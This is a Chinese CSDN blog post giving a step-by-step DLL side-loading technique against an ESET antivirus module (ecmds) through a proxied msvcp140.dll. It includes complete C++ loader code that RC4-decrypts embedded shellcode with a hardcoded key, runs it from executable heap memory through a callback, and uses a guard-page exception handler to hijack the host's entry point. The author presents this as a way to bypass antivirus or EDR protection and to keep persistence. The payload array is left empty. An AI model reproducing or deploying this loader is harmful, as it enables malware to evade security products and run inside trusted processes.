一种应用更广泛的DLL侧载方法

已于 2022-10-02 16:44:28 修改
阅读量765 收藏
点赞数
文章标签: microsoft windows
于 2022-09-20 18:13:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xmd213131/article/details/126956533
版权

一种应用更广泛的DLL侧载方法

1.寻找劫持对象

使用ProcessMonitor查看目标程序加载dll情况
这里侧载的对象是eset 32的一个模块ecmds,侧载的dll为msvcp140.dll
在这里插入图片描述
可以看到堆栈的情况,并没有调用LoadLibrary函数的情况,该dll加载先于程序的入口点,原始程序加载完dll运行一段时间就会退出,因此可以在msvcp140.dll被加载后将程序入口点patch阻断原始程序的运行流程
在这里插入图片描述

2.dll侧载

使用SharpDllProxy将msvcp140.dll的导出函数导出到文件中,该工具会生成一个.c的文件和一个dll,这个dll就是原始的msvcp140.dll
在这里插入图片描述
在这里插入图片描述

将上面导出的函数替换到下面代码的位置,然后编译生成dll文件,将该dll文件重命名为msvcp140.dll

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"

#使用SharpDllProxy到处的原始dll的导出函数

HANDLE threadHandle = NULL;
PVOID pmem;
PVOID addr;
PBYTE loaderEntryPoint;
DWORD lpflOldProtect;
DWORD lpflOldProtect1;

unsigned char shellcode[] = {};
unsigned int len = 894;

BOOL DecryptShellcode()
{
	BOOL bSuccess = TRUE;

	HCRYPTKEY hCryptoKey;
	HCRYPTHASH hCryptHash;
	HCRYPTPROV hCryptoProv;

	DWORD dwLen = 10;
	unsigned char pbKey[] = "qwe123qaz?";
	bSuccess = CryptAcquireContextW(&hCryptoProv, NULL, L"Microsoft Enhanced RSA and AES Cryptographic Provider", PROV_RSA_AES, CRYPT_VERIFYCONTEXT);
	if (!bSuccess)
	{
		goto CLEANUP;
	}

	bSuccess = CryptCreateHash(hCryptoProv, ((4 << 13 | (0) | 12)), 0, 0, &hCryptHash);
	if (!bSuccess)
	{
		goto CLEANUP;
	}

	bSuccess = CryptHashData(hCryptHash, pbKey, dwLen, 0);
	if (!bSuccess)
	{
		goto CLEANUP;
	}

	bSuccess = CryptDeriveKey(hCryptoProv, CALG_RC4, hCryptHash, 0, &hCryptoKey);
	if (!bSuccess)
	{
		goto CLEANUP;
	}

	bSuccess = CryptDecrypt(hCryptoKey, NULL, FALSE, 0, (BYTE*)shellcode, (PDWORD)&len);
	if (!bSuccess)
	{
		goto CLEANUP;
	}
	goto CLEANUP;

CLEANUP:
	CryptReleaseContext(hCryptoProv, 0);
	CryptDestroyKey(hCryptoKey);
	CryptDestroyHash(hCryptHash);

	return bSuccess;
}

VOID ExecuteShellcode() {

	DecryptShellcode();

	HANDLE hHep = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
	pmem = (PBYTE)HeapAlloc(hHep, 0, len);

	memcpy(pmem, shellcode, len);
	EnumChildWindows((HWND)NULL, (WNDENUMPROC)pmem, NULL);

}

LONG NTAPI VEH(PEXCEPTION_POINTERS pExcepInfo)
{

	//if (pExcepInfo->ExceptionRecord->ExceptionAddress == loaderEntryPoint)

	if (pExcepInfo->ExceptionRecord->ExceptionCode == EXCEPTION_GUARD_PAGE) {

		if (pExcepInfo->ExceptionRecord->ExceptionAddress == loaderEntryPoint) {
			//ExecuteShellcode();
			VirtualProtect(loaderEntryPoint, 1, lpflOldProtect, &lpflOldProtect);
			//VirtualProtect(Sleep, 1, PAGE_EXECUTE_READWRITE | PAGE_GUARD, &lpflOldProtect1);
			
			WaitForSingleObjectEx(threadHandle, INFINITE, TRUE);
			return EXCEPTION_CONTINUE_EXECUTION;
		}
	}

	return EXCEPTION_CONTINUE_SEARCH;
}


VOID Patch() {

	HMODULE loaderImage = GetModuleHandleA(NULL);
	DWORD len = 1;

	loaderEntryPoint = (PBYTE)loaderImage + *(DWORD*)((PBYTE)loaderImage + *((DWORD*)loaderImage + 15) + 40);
	//addr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");

	VirtualProtect(loaderEntryPoint, 1, PAGE_EXECUTE_READ|PAGE_GUARD, &lpflOldProtect);

	//_NtProtectVirtualMemory(hProc, (PVOID*)&loaderEntryPoint, (PSIZE_T)&len, PAGE_EXECUTE_READWRITE | PAGE_GUARD, &lpflOldProtect);
	//ExecuteShellcode();
	//*(loaderEntryPoint) = 0xcc;

	AddVectoredExceptionHandler(0, &VEH);
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
		threadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ExecuteShellcode, NULL, 0, NULL);
		Patch();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

将ecmds和tmpBC2E.dll以及msvcp140.dll放在同一目录运行,BOOM!
在这里插入图片描述
在这里插入图片描述

对edr或者杀软的组件进行侧载会有意想不到的效果,可能会绕过某些杀软的防护
一般的,edr或者杀软都会开机启动,因此对这类程序的dll劫持也能够起到很好的权限维持效果

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dll加载_绕过LoadLibrary 加载DLL
weixin_39595621的博客
12-20 314
#include typedef struct _UNICODE_STRING { // UNICODE_STRING structureUSHORT Length;USHORT MaximumLength;PWSTR Buffer;} UNICODE_STRING;typedef UNICODE_STRING *PUNICODE_STRING;typedef NTSTATUS (WINAPI *...
dll加载手册
jentle8的博客
08-28 352
dll sideloading 在恶意软件对抗中并不少用,快速使用和识别可以加速分析过程
C++函数动态链接库及静态链接
csh1915259502的博客
10-12 1039
动态链接库的使用方法,动态链接库的动态调用(也叫显式调用)可以运用了,但是静态调用(也叫隐式调用)这种很少见。   (一)先回顾一下,动态链接库和静态链接库   静态链接库:lib中的函数不仅被连接,全部实现都被直接包含在最终生成的EXE文件中,只是实现是不可见的。   动态链接库:dll不必被包含在最终的EXE中,静态调用时仅把函数名或者变量名或者类名链接到EXE文件中,而这些东西的实体都只有
探索DueDLLigence:绕过白名单与DLL加载的艺术
最新发布
gitblog_00029的博客
05-22 389
探索DueDLLigence:绕过白名单与DLL加载的艺术 项目地址:https://gitcode.com/mandiant/DueDLLigence 项目介绍 DueDLLigence是一个创新的Shellcode运行框架,设计用于规避应用程序白名单检测和实现DLL加载。这个项目的核心是其内置的Shellcode,能够无声无息地启动calc.exe,展示了在现代防御体系下如何保持隐蔽性和有...
探索 SharpDllProxy:一个智能的 DLL 代理生成器
gitblog_00032的博客
04-15 373
探索 SharpDllProxy:一个智能的 DLL 代理生成器 项目地址:https://gitcode.com/Flangvik/SharpDllProxy 项目简介 SharpDllProxy 是由开发者 Flangvik 创建的一个开源项目,旨在简化 .NET 应用程序中动态链接库(DLL)的使用和管理。它通过生成 C# 封装类,使得与原生 DLL 的交互变得加简单、安全且易于维护。 技...
SharpDllProxy:从合法的DLL检索导出的函数,并生成用于DLL代理加载侧载的代理DLL源代码模板
03-19
SharpDll代理 从合法的DLL检索导出的函数,并为DLL代理加载侧载生成代理DLL源代码/模板 与redteaming.co.uk的博客文章一起创建-> 用法 利润 学分 Vivek Ramachandran将
利用Process Monitor软件解决无法加载DLL文件的问题
枫叶的专栏
04-24 6842
这次我就利用Process Monitor这一神器来解决该问题。 首先介绍一下Process Monitor,Process Monitor一款系统进程监视软件,总体来说,Process Monitor相当于Filemon+Regmon,其中的Filemon专门用来监视
DLL两种加载的详解
画圈圈的猿
03-08 3457
DLL两种加载的详解 参照链接:http://www.cnblogs.com/tswcypy/p/4554041.html 目前以lib后缀的库有两种,一种为静态链接库(Static Libary,以下简称“静态库”),另一种为动态连接库(DLL,以下简称“动态库”)的导入库(Import Libary,以下简称“导入库”)。   静态库是一个或者多个obj文件的打包,所以有人干
动态链接库dll的两种加载方式
weixin_34232744的博客
08-31 2346
在第一篇技术博客"动态链接库简介"中说到了两种加载方式,当时没有详细说明,这里详细说明一下可以通过两种方式 1.隐式链接(需要.dll,.lib,.h) 2.显式链接(需要.dll,.h)方法1:隐式链接----需要.lib,.dll,.h文件隐式链接就是在程序开始执行时就将DLL文件加载到内存当中,而显示链接,是实时加载,程序需要的时候加载,不需要的...
dll加载_LoadLibrary无法加载DLL解决思路
weixin_39517202的博客
12-20 405
用LoadLibrary和GetProcAddress加载DLL时,可能会碰到LoadLibrary无法正确加载DLL,返回值总是NULL的情况。一般而言,可按下面的思路解决:(1)检查dll的路径是否正确。可先用绝对路径试一下,若可以,那说明相对路径设置错了。简单的测试当面目录的方法就是随便写一个文件,比如std::ofstream outfile("test.txt"),然后看输出的test....
DLLsForHackers:可以用于加载和其他攻击媒介的Dll
03-20
DLLsForHackers 可用于加载和其他攻击媒介的Dll。此Dll不会导致死锁,因为它仅使用如下所述的DllMain安全的功能。 为什么? 我看到太多的POC与在DLL_PROCESS_ATTACH执行的代码。实际上,大多数情况下,恶意代码无法按照Microsoft的说明进行工作( )。 您永远不要在DllMain中执行以下任务: 调用LoadLibrary或LoadLibraryEx(直接或间接)。这可能会导致死锁或崩溃。 调用GetStringTypeA,GetStringTypeEx或GetStringTypeW(直接或间接)。这可能会导致死锁或崩溃。 与其他线程同步。这可能会导致死锁。 获取由等待获取加载程序锁的代码所拥有的同步对象。这可能会导致死锁。 通过使用CoInitializeEx初始化COM线程。在某些情况下,此函数可以调用LoadLibraryEx。 调用注
DLL代理转发与维权
蚁景网安学院
11-13 586
亲爱的,关注我吧11/12文章共计1101个词预计阅读7分钟来和我一起阅读吧本文涉及知识点实操练习——特征码免杀MYCCL应用 https://www.hetianlab.com/ex...
如何获取加载应用程序以显示在Fire Tablets的FreeTime配置文件中
culunyi0802的博客
09-13 784
Amazon’s Fire Tablets are an excellent choice for inexpensive kids’ tablets, and the FreeTime Profiles work really well to keep things sandboxed so little ones can’t run rampant throughout the OS. The...
LINUX SHELL下利用SYSFS加载PLbitstream
Huskar_Liu的博客
04-20 722
xlnx-linux2017.4版本。 首先,make menuconfig 我们需要选择 device driver --> char device --> xilinx devcfg 选中这个选项后,才会编译生成.o文件。 然后make all 然后make uImage 替换掉ZED上的内核, 进入SHELL,首先 # ls -l /dev 我们会在下面发现设备文件xdevcfg...
android登陆加载加载_如何在Android上加载应用
cum88284的博客
09-26 669
android登陆加载加载Just because an app isn’t available from the Google Play Store doesn’t mean it’s not available at all—you can effectively install non-Play Store apps on any Android phone, tablet, or othe...
绕过LoadLibrary 加载DLL
afumz68826的专栏
12-09 175
#include <Windows.h> typedef struct _UNICODE_STRING { // UNICODE_STRING structure USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING; typedef UNICODE_STRING *PUNICODE_STRIN...
@value 静态变量_调试实战 —— dll 加载失败之全局变量初始化篇
weixin_39931390的博客
11-20 166
前言最近项目里总是遇到 dll 加载不上的问题,原因各种各样。今天先总结一个虽然不是项目中实际遇到的问题,但是却非常经典的情况。其它情况,后续慢慢总结。示例代码包含一个 exe 工程,两个 dll 工程。 exe 会加载两个 dll 并调用它们的导出函数(GetCallCount),结果只有一个 dll 的导出函数被成功调用。会是什么原因呢?现象运行效果如下图:通过 dumpbin 已经确认两个 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值